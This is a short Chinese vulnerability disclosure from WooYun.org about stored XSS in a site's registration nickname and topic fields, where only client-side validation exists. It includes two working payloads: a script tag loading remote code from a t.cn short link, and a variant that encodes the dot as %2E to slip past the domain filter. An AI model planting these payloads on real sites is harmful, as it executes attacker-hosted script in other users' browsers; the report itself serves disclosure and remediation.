WooYun.org

首先来说说用户昵称，在注册的时候前台有检测但是后台却没有。禁用js后，昵称输入<script src="http://t.cn/8kVihEe"></script>宇宙大船长，这样明显可以直接提交，如果不想一下就被测出来,你可以做成只能有js提交，如果想避免，那么你后台该过滤就过滤，该正则就正则。我不明白的是你修改昵称都验证了，怎么创建用户的时候不验证，还有就是，我发现你们大量的html标签属性里面如：alt/titile等都有昵称输出，所以这个还是过滤的好，不建议转义。
然后再说说主题：主题标题只做了字数限制，没有过滤，然后是寄语，还好你们不允许发链接做了过滤,但是.+域名后缀扫一下就可以过滤？.可以编码有木有的啊。<script src="http://t%2Ecn/8kVihEe"></script>轻松绕过。
只看了这两地方，目测还有很多，好像你们也不大关心xss,如果估计被利用起来死伤一大片